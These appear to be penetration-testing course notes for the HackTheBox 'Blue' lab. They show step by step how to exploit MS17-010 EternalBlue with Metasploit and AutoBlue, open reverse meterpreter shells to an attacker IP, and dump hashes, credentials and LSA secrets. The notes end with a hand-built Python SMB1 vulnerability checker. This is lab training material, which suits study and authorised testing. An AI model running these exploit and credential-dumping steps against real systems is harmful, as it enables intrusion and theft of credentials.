TCM PEH Hacking Blue Notes


HTB Blue

MS17-010 (EternalBlue): remote code execution in SMBv1
You'll see this on penetration tests all the time on internal networks
NOTE: EternalBlue can bring down (BSOD) the target machine, so run the vulnerability check first and only exploit with permission

nmap -A -T4 -p- 10.10.10.40
Noted 139 (NetBIOS) open
Noted 445 (SMB) open
Noted Windows 7 SP1 <------- always think EternalBlue (MS17-010)


msfconsole
search ms17-010
Noted an auxiliary scanner for ms17_010 (non-destructive check, safe to run before the exploit)
use auxiliary/scanner/smb/smb_ms17_010
options
set rhosts 10.10.10.40
options
run
Noted result “Host is likely VULNERABLE to MS17-010!”
use exploit/windows/smb/ms17_010_eternalblue
options
set rhost 10.10.10.40
show targets
exploit
NOTE: This exploit doesn't always work the first time; just run exploit again, but remember every attempt can crash the target
Noted shell created
whoami
hostname
ctrl+c (answer y) to abort the shell session and drop back to msfconsole


payloads
set payload windows/x64/meterpreter/reverse_tcp
options
exploit
Noted shell created
getuid
sysinfo
hashdump
shell
route print
arp -a
netstat -ao
ctrl+c (answer y) to terminate the cmd channel and drop back to meterpreter
ps
Noted that this 4444 shell is an svchost.exe process
load kiwi
help
creds_all
lsa_dump_sam
lsa_dump_secrets
load incognito
list_tokens -u
exit to kill the meterpreter session and drop back to msfconsole
exit again to quit msfconsole


Googled autoblue github
Noted result link at github
cd /opt
git clone https://github.com/3ndg4me/AutoBlue-MS17-010.git
cd AutoBlue*
ls
python eternalblue_checker.py 10.10.10.40
Noted result “The target is not patched” (the checker needs impacket installed; it runs the same non-destructive check as the msf scanner)
cd ./shellcode
./shell_prep.sh
y            <- auto-generate the reverse shell with msfvenom
10.10.14.24  <- LHOST (attacker IP)
4445         <- LPORT for the x64 payload
4448         <- LPORT for the x86 payload
0            <- 0 = meterpreter, 1 = regular cmd shell
0            <- 0 = staged, 1 = stageless
cd ..
ls
./listener_prep.sh
10.10.14.24  <- LHOST (same as above)
4445         <- LPORT for the x64 handler (must match shell_prep)
4446         <- LPORT for the x86 handler (doesn't match the 4448 above; harmless here because Blue is x64, but keep them the same)
0            <- 0 = meterpreter
0            <- 0 = staged
Noted metasploit multihandler opened
cd ..
ls
python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
Noted session in metasploit multihandler
sessions 1
getuid
hostname
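What the msf scanner ("Host is likely VULNERABLE") and AutoBlue's eternalblue_checker.py ("The target is not patched") actually test is the same thing: negotiate SMBv1, open a null session, tree-connect to IPC$, then send an SMB_COM_TRANSACTION with a PeekNamedPipe setup on FID 0. An unpatched server answers with STATUS_INSUFF_SERVER_RESOURCES (0xC0000205); a patched one returns STATUS_INVALID_HANDLE or STATUS_ACCESS_DENIED. The script below is an added example, not code from the course, from Metasploit or from AutoBlue: the SMB1 packets are hand-built from the MS-CIFS layouts (Unicode off, so all strings are ASCII), all function names are mine, and it assumes the target speaks SMBv1 on 445 and allows a null session (true for HTB Blue). Unlike the exploit it does not crash the box.

```python
"""Raw-SMB1 MS17-010 check (added example; not the Metasploit module or AutoBlue's checker)."""
import socket
import struct
import sys

SMB_COM_TRANSACTION = 0x25
SMB_COM_NEGOTIATE = 0x72
SMB_COM_SESSION_SETUP_ANDX = 0x73
SMB_COM_TREE_CONNECT_ANDX = 0x75
TRANS_PEEK_NAMED_PIPE = 0x23

STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205  # unpatched servers answer PeekNamedPipe(FID 0) with this
STATUS_INVALID_HANDLE = 0xC0000008           # patched
STATUS_ACCESS_DENIED = 0xC0000022            # patched / hardened


def smb_header(command, status=0, tid=0, uid=0, mid=1):
    """32-byte SMB1 header. Flags1 0x18; Flags2 0x4001 = NT status codes + long names (no Unicode)."""
    return struct.pack("<4sBIBHHQHHHHH", b"\xffSMB", command, status, 0x18, 0x4001,
                       0, 0, 0, tid, 0xFEFF, uid, mid)


def netbios(smb):
    """NetBIOS session message: type 0x00 followed by a 3-byte big-endian length."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def negotiate():
    dialects = b"\x02NT LM 0.12\x00"
    return smb_header(SMB_COM_NEGOTIATE) + b"\x00" + struct.pack("<H", len(dialects)) + dialects


def session_setup_anonymous():
    """Session Setup AndX, WordCount 13, null session: one-byte empty OEM password, no Unicode password."""
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 4356, 2, 1, 0, 1, 0, 0, 0x50)
    data = b"\x00" + b"\x00" + b"\x00" + b"Unix\x00" + b"Samba\x00"  # password, user, domain, OS, LanMan
    return smb_header(SMB_COM_SESSION_SETUP_ANDX) + b"\x0D" + words + struct.pack("<H", len(data)) + data


def tree_connect_ipc(target, uid):
    """Tree Connect AndX (WordCount 4) to \\\\target\\IPC$ with an empty password."""
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)
    data = b"\x00" + ("\\\\%s\\IPC$" % target).encode() + b"\x00" + b"?????\x00"
    return smb_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid) + b"\x04" + words + struct.pack("<H", len(data)) + data


def peek_named_pipe(tid, uid):
    """SMB_COM_TRANSACTION, WordCount 16: setup = PeekNamedPipe (0x23) on FID 0, no parameters or data."""
    setup = struct.pack("<HH", TRANS_PEEK_NAMED_PIPE, 0)
    name = b"\\PIPE\\\x00"
    offset = 32 + 1 + 16 * 2 + 2 + len(name)  # where params/data would start, relative to the SMB header (0x4A)
    words = struct.pack("<HHHHBBHIHHHHHBB", 0, 0, 1024, 65504, 0, 0, 0, 0, 0,
                        0, offset, 0, offset, 2, 0) + setup
    return smb_header(SMB_COM_TRANSACTION, tid=tid, uid=uid) + b"\x10" + words + struct.pack("<H", len(name)) + name


def parse_header(smb):
    """Return (command, nt_status, tid, uid) from an SMB1 response."""
    if len(smb) < 32 or smb[:4] != b"\xffSMB":
        raise ValueError("not an SMB1 packet")
    command, status = struct.unpack_from("<BI", smb, 4)
    tid, _pid, uid = struct.unpack_from("<HHH", smb, 24)
    return command, status, tid, uid


def verdict(status):
    """Same decision the scanners make from the PeekNamedPipe response status."""
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "likely VULNERABLE to MS17-010 (not patched)"
    if status in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return "appears patched"
    return "inconclusive (NT status 0x%08X)" % status


def recv_smb(sock):
    def recv_exact(n):
        buf = b""
        while len(buf) < n:
            chunk = sock.recv(n - len(buf))
            if not chunk:
                raise ConnectionError("SMB server closed the connection")
            buf += chunk
        return buf
    length = int.from_bytes(recv_exact(4)[1:], "big")
    return recv_exact(length)


def check(target, port=445, timeout=5):
    """Negotiate -> null session -> IPC$ -> PeekNamedPipe; returns the verdict string."""
    with socket.create_connection((target, port), timeout=timeout) as s:
        for pkt in (negotiate(), session_setup_anonymous()):
            s.sendall(netbios(pkt))
            _, status, _, uid = parse_header(recv_smb(s))
            if status:
                raise RuntimeError("SMB setup failed, NT status 0x%08X" % status)
        s.sendall(netbios(tree_connect_ipc(target, uid)))
        _, status, tid, _ = parse_header(recv_smb(s))
        if status:
            raise RuntimeError("IPC$ tree connect failed, NT status 0x%08X" % status)
        s.sendall(netbios(peek_named_pipe(tid, uid)))
        return verdict(parse_header(recv_smb(s))[1])


if __name__ == "__main__":
    print(check(sys.argv[1] if len(sys.argv) > 1 else "10.10.10.40"))
```

Run it as `python3 checker.py 10.10.10.40`. The one thing the scanners do beyond this is fingerprint the OS from the session setup response; the verdict itself comes only from the NT status of that last transaction, which is why the check is safe to run against production hosts where the exploit is not.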
